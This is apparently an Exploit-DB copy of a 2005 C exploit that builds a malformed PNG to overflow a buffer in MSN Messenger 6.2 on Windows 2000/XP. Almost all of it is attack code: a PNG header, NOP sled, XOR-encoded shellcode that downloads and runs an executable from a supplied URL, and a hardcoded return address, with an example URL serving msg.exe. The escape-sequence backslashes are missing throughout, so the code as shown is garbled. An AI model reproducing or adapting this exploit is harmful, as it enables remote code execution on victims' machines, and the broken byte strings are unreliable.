https://www.exploit-db.com/exploits/804

漏洞细节尚未披露

/*
*
* Remember g++ k /str0ke
*
*/

/*
*
* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit
* Bug discoveried by Core Security Technologies  (www.coresecurity.com)
* Exploit coded By ATmaCA
* Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: http://www.atmacasoft.com
* E-Mail: [email protected]
* Credit to kozan and delikon
* Now compiles under Linux thanks to dgr
* Usage:exploit <OutputPath> <Url>
*
*/

/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/

/*
*
* After creating vuln png image, open
* MSN Messenger and select it as your display picture in
* "Tools->Change Display Picture".
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>


#ifdef __BORLANDC__
         #include <mem.h>
         #include <conio.h>
#endif

#define NOP 0x90

char png_header[] =
"x89x50x4Ex47x0Dx0Ax1Ax0Ax00x00x00x0Dx49x48x44x52"
"x00x00x00x40x00x00x00x40x08x03x00x00x00x9DxB7x81"
"xECx00x00x01xB9x74x52x4Ex53";

char pngeof[] = "x90x90x90x59xE8x47xFExFFxFF";

/* Generic win32 http download shellcode
   xored with 0x1d by delikon (http://delikon.de/) */
char shellcode[] = "xEB"
"x10x58x31xC9x66x81xE9x22xFFx80x30x1Dx40xE2xFAxEBx05xE8xEBxFF"
"xFFxFFxF4xD1x1Dx1Dx1Dx42xF5x4Bx1Dx1Dx1Dx94xDEx4Dx75x93x53x13"
"xF1xF5x7Dx1Dx1Dx1Dx2CxD4x7BxA4x72x73x4Cx75x68x6Fx71x70x49xE2"
"xCDx4Dx75x2Bx07x32x6DxF5x5Bx1Dx1Dx1Dx2CxD4x4Cx4Cx90x2Ax4Bx90"
"x6Ax15x4Bx4CxE2xCDx4Ex75x85xE3x97x13xF5x30x1Dx1Dx1Dx4Cx4AxE2"
"xCDx2CxD4x54xFFxE3x4Ex75x63xC5xFFx6ExF5x04x1Dx1Dx1DxE2xCDx48"
"x4Bx79xBCx2Dx1Dx1Dx1Dx96x5Dx11x96x6Dx01xB0x96x75x15x94xF5x43"
"x40xDEx4Ex48x4Bx4Ax96x71x39x05x96x58x21x96x49x18x65x1CxF7x96"
"x57x05x96x47x3Dx1CxF6xFEx28x54x96x29x96x1CxF3x2CxE2xE1x2CxDD"
"xB1x25xFDx69x1AxDCxD2x10x1CxDAxF6xEFx26x61x39x09x68xFCx96x47"
"x39x1CxF6x7Bx96x11x56x96x47x01x1CxF6x96x19x96x1CxF5xF4x1Fx1D"
"x1Dx1Dx2CxDDx94xF7x42x43x40x46xDExF5x32xE2xE2xE2x70x75x75x33"
"x78x65x78x1D";

FILE           *di;
int            i = 0;
short int      weblength;
char           *web;
char           *pointer = NULL;
char           *newshellcode;

/*xor cryptor*/
char *Sifrele(char *Name1)
{
        char *Name=Name1;
        char xor=0x1d;
        int Size=strlen(Name);
        for(i=0;i<Size;i++)
                Name[i]=Name[i]^xor;
        return Name;
}


int main(int argc, char *argv[])
{

        if (argc < 3)
        {
                printf("MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploitn");
                printf("Bug discoveried by Core Security Technologies  (www.coresecurity.com)n");
                printf("Exploit coded By ATmaCAn");
                printf("Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.n");
                printf("Web: http://www.atmacasoft.comn");
                printf("E-Mail: [email protected]");
                printf("Credit to kozan and delikonnn");
                printf("tUsage:exploit <OutputPath> <Url>n");
                printf("tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exen");

                return 0;
        }


	web = argv[2];


        if( (di=fopen(argv[1],"wb")) == NULL )
        {
                printf("Error opening file!n");
                return 0;
        }
        for(i=0;i<sizeof(png_header)-1;i++)
                fputc(png_header[i],di);

        /*stuff in a couple of NOPs*/
        for(i=0;i<99;i++)
                fputc(NOP,di);

        weblength=(short int)0xff22;
        pointer=strstr(shellcode,"x22xff");
	weblength-=strlen(web)+1;
        memcpy(pointer,&weblength,2);
        newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
        strcpy(newshellcode,shellcode);
        strcat(newshellcode,Sifrele(web));
        strcat(newshellcode,"x1d");

        //shell code
        for(i=0;i<strlen(newshellcode);i++)
                fputc(newshellcode[i],di);


        for(i=0;i<(83-strlen(web));i++) //NOPs
                fputc(NOP,di);

	/*Overwriting the return address (EIP)*/
        /*0x005E0547 - ret */
        fputc(0x47,di);
        fputc(0x05,di);
        fputc(0x5e,di);
        fputc(0x00,di);

        for(i=0;i<sizeof(pngeof)-1;i++)
                fputc(pngeof[i],di);

        printf("Vulnarable png file %s has been generated!n",argv[1]);

        fclose(di);

	return 1;
}

// milw0rm.com [2005-02-09]